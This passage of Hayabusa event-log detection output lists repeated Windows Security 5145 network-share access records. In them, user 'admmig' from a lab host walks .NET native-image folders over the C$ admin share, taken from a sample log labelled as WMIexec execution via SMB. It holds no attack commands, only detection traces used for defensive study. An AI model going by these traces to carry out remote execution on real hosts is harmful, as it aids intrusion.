Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c9175f8#\6a2929eeb7b5fa6ff9ef1b0f4ff440f1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1da2af67#\efd939ad16f7521ac6c0c15afdcb2fa2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.347 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio4b37ff64#\8bb4776b03f3c369fd0c81c51cf468ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\92388fbe99436e6ed1f56ee56f10c565 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.363 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio49d6fefe#\9bb6d55c49486153c1c1872929def220 | IP Addr: 10.23.23.9 | LID: 